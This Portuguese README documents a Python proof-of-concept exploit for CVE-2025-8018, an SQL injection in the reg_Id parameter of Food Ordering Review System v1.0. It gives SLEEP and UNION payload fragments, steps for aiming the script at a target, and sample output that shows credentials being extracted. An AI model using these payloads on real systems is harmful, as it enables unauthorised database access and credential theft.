
Exploração PoC em Python para CVE-2025-8018, uma injeção SQL não autenticada crítica no Food Ordering Review System v1.0. Suporta extração de dados baseada em tempo cega e baseada em UNION para hacking ético e treinamento CTF.
Este repositório fornece um proof-of-concept (PoC) em Python para CVE‑2025‑8018, uma vulnerabilidade de SQL Injection de alta gravidade descoberta no Food Ordering Review System v1.0. A vulnerabilidade é acionada através do parâmetro reg_Id em reservation_page.php.
/user/reservation_page.phpreg_Idusers, sem autenticaçãoSLEEP()UNION SELECT NULL,NULL,...requestsInstale as dependências:
pip install requests
Clone o repositório:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
Atualize o URL alvo:
Abra o ficheiro cve-2025-8018.py e modifique:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" Substitua TARGET-IP pelo endereço real do sistema vulnerável.
Execute o script do exploit:
python3 cve-2025-8018.py
Saída
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Aviso de Responsabilidade Este PoC é fornecido estritamente para fins educacionais, como desafios CTF, treinamento de cibersegurança ou testes de defesa em seus próprios sistemas.
Não use isto contra sistemas em produção ou sistemas para os quais você não tenha permissão explícita para testar. O autor e quaisquer partes associadas não são responsáveis pelo uso indevido ou danos resultantes do código.